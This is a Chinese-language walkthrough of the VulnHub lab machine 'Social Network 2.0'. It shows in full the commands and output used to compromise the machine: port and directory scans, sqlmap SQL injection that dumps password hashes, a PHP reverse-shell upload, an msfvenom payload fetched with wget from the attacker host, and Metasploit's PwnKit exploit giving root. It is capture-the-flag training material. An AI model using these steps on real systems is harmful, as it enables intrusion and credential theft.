Socnet
作者:jason huawen
靶机信息
名称:BoredHackerBlog: Social Network 2.0
地址:
https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:26:b1:cb 1 60 PCS Systemtechnik GmbH
192.168.56.169 08:00:27:5b:b3:1b 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.169
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 21:56 EDT
Nmap scan report for bogon (192.168.56.169)
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
| 256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
|_ 256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Social Network
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
8000/tcp open http BaseHTTPServer 0.3 (Python 2.7.15rc1)
|_http-server-header: BaseHTTP/0.3 Python/2.7.15rc1
|_xmlrpc-methods: XMLRPC instance doesn't support introspection.
|_http-title: Error response
MAC Address: 08:00:27:5B:B3:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ nikto -h http://192.168.56.169
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.169
+ Target Hostname: 192.168.56.169
+ Target Port: 80
+ Start Time: 2023-04-22 22:00:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3268: /database/: Directory indexing found.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2023-04-22 22:01:42 (GMT-4) (63 seconds)
---------------------------------------------------------------------------
/databases/目录中有2个sql文件,将其下载到本地
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ cat DML.sql
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
VALUES ("Armin", "Virgil", "armin@gmail.com", "M", "2001-02-05");
INSERT INTO users(user_firstname, user_lastname, user_nickname, user_password, user_email, user_gender, user_birthdate, user_status)
VALUES ("Paul", "James", "Pynch", "paul@gmail.com", "M", "1998-12-19", "S");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
VALUES ("Chris", "Wilson", "chris@gmail.com", "M", "1996-01-18");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate, user_status)
VALUES ("Rory", "Blue", "rory@gmail.com", "F", "1994-04-18", "M");
INSERT INTO users(user_firstname, user_lastname, user_password, user_email, user_gender, user_birthdate)
VALUES ("Andrea", "Surman", "andrea@gmail.com", "M", "1994-06-06");
Insert语句中,并没有密码值,有点奇怪。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.txt,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.169
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,js,txt,bak
[+] Timeout: 10s
===============================================================
2023/04/22 22:06:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/images (Status: 301) [Size: 317] [--> http://192.168.56.169/images/]
/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 10609]
/search.php (Status: 302) [Size: 1490] [--> index.php]
/home.php (Status: 302) [Size: 4234] [--> index.php]
/resources (Status: 301) [Size: 320] [--> http://192.168.56.169/resources/]
/profile.php (Status: 302) [Size: 2845] [--> index.php]
/data (Status: 301) [Size: 315] [--> http://192.168.56.169/data/]
/includes (Status: 301) [Size: 319] [--> http://192.168.56.169/includes/]
/friends.php (Status: 302) [Size: 1669] [--> index.php]
/database (Status: 301) [Size: 319] [--> http://192.168.56.169/database/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/functions (Status: 301) [Size: 320] [--> http://192.168.56.169/functions/]
/requests.php (Status: 302) [Size: 1719] [--> index.php]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1322305 / 1323366 (99.92%)
===============================================================
Gobuster工具没有扫描出有价值的信息。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ curl http://192.168.56.169:8000/
<head>
<title>Error response</title>
</head>
<body>
<h1>Error response</h1>
<p>Error code 501.
<p>Message: Unsupported method ('GET').
<p>Error code explanation: 501 = Server does not support this operation.
</body>
不支持GET方法?那用burpsuite拦截请求,修改为POST
但是返回是空的,没有任何内容
利用Gobuster工具,并且这只-m 请求方法参数,对8000端口进行扫描
注册一个新用户,然后登陆,有个搜索功能,貌似有SQL注入漏洞,用burpsuite拦截请求,并存储为文件
http://192.168.56.169/search.php?location=emails&query=test
(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3
经测试,目标主机存在SQL注入漏洞
─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] socialnetwork
[*] sys
─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork --tables
Database: socialnetwork
[4 tables]
+------------+
| friendship |
| posts |
| user_phone |
| users |
+------------+
─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users --columns
Database: socialnetwork
Table: users
[11 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| user_about | text |
| user_birthdate | date |
| user_email | varchar(255) |
| user_firstname | varchar(20) |
| user_gender | char(1) |
| user_hometown | varchar(255) |
| user_id | int(11) |
| user_lastname | varchar(20) |
| user_nickname | varchar(20) |
| user_password | varchar(255) |
| user_status | char(1) |
+----------------+--------------+
─(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sqlmap -r req.txt --level=3 -D socialnetwork -T users -C user_email,user_password --dumpTable: users
[3 entries]
+------------------------+----------------------------------+
| user_email | user_password |
+------------------------+----------------------------------+
| admin@localhost.com | 21232f297a57a5a743894a0e4a801fc3 |
| testuser@localhost.com | 5d9c68c6c50ed3d02a2fcf54f63993b6 |
| test@test.com | e10adc3949ba59abbe56e057f20f883e |
+------------------------+----------------------------------+
用在线网站解密,admin@localhost.com的密码为admin,成功登陆,在profile上可以上传图片,看能否将shell.php上传
没有任何过滤机制,成功上传shell.php文件,拿到目标主机反弹的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.169] 38434
Linux socnet2 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
02:40:11 up 47 min, 0 users, load average: 0.05, 0.31, 0.75
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@socnet2:/$ cd /home
cd /home
www-data@socnet2:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 29 2018 .
drwxr-xr-x 25 root root 4.0K Oct 29 2018 ..
drwxr-xr-x 6 socnet socnet 4.0K Oct 29 2018 socnet
提权
──(kali㉿kali)-[~/Desktop/Vulnhub/Socnet]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
创建payload后,将其上传到目标主机/tmp目录下
www-data@socnet2:/tmp$ wget http://192.168.56.230:8000/escalate.elf
wget http://192.168.56.230:8000/escalate.elf
--2023-04-23 02:55:00-- http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: 'escalate.elf'
escalate.elf 100%[===================>] 207 --.-KB/s in 0s
2023-04-23 02:55:00 (39.3 MB/s) - 'escalate.elf' saved [207/207]
www-data@socnet2:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
执行该文件得到meterpreter会话,然后利用suggester定位可以提权的模块
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.169 - Collecting local exploits for x86/linux...
[*] 192.168.56.169 - 167 exploit checks are being tried...
[+] 192.168.56.169 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.169 - exploit/linux/local/nested_namespace_idmap_limit_priv_esc: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.169 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.169 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.169 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dmofmj
[+] The target is vulnerable.
[*] Writing '/tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.ebvnqpec
[*] Sending stage (3020772 bytes) to 192.168.56.169
[+] Deleted /tmp/.ebvnqpec/rqmsyuzae/rqmsyuzae.so
[+] Deleted /tmp/.ebvnqpec/.omnoepjvoqxi
[+] Deleted /tmp/.ebvnqpec
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.169:33970) at 2023-04-23 02:30:11 -0400
meterpreter > shell
Process 1899 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 32K
drwx------ 4 root root 4.0K Oct 29 2018 .
drwxr-xr-x 25 root root 4.0K Oct 29 2018 ..
-rw------- 1 root root 5 Oct 29 2018 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Oct 29 2018 .local
-rw------- 1 root root 128 Oct 29 2018 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Oct 29 2018 .ssh
至此拿到了root shell和root flag